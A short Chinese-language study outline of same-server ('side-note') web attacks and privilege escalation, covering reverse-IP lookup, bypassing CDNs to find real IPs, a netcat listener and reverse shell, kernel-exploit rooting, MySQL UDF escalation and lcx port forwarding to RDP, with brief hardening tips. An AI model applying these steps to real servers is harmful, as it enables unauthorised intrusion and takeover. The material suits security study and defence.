旁注攻击 同服渗透
旁注包括两部分:旁注和提权
ip逆向查询同服网站
旁注查询软件scscaner
数据库权限最小化原则
网站目录的可写和执行权限
攻击思路:
如果数据库的权限大
可以构造注入点
CDN加速隐藏真实ip
ip节点
获取真实ip
我们不能被自身的问题交给
cdn来处理,把自己的问题处理好
才是真正的防御之道。
提权分类:
溢出提权:利用系统本身或者
系统中的软件来提权
又分为远程溢出和本地溢出
远程溢出:系统漏洞补丁
本地溢出条件:
需要一个用户可执行权限
第三方组件提权
黑客是如何用溢出提权的?
Linux提权
攻击思路:
利用执行exp来提权
1)查看内核
uname -a
id&uname -a
2)监听本地端口
nc -l -n -v -p 8888
此时计算机为外网ip,否则需要转发
3)大马反弹shell
nc反弹
为什么?需要反弹
因为在脚本中运行shell
没有回显信息
4)上传exp溢出提权
获得服务器的root权限
windows提权
1)探测服务器支持的脚本语言
2)执行简单的系统命令
数据库提权
mysql5.0倒入道c:/windows
5.1倒入道plugin安装目录
mysql udf用户自定义函数 提权
启动项提权
第三方组件提权
防止端口扫描 修改端口 复杂密码
服务器在内网中的常见端口转发:
lcx转发:
服务器端:
lcx -listen 8888
客户端:
lcx -slave rip rport 127.0.0.1 3389
领取专属 10元无门槛券
私享最新 技术干货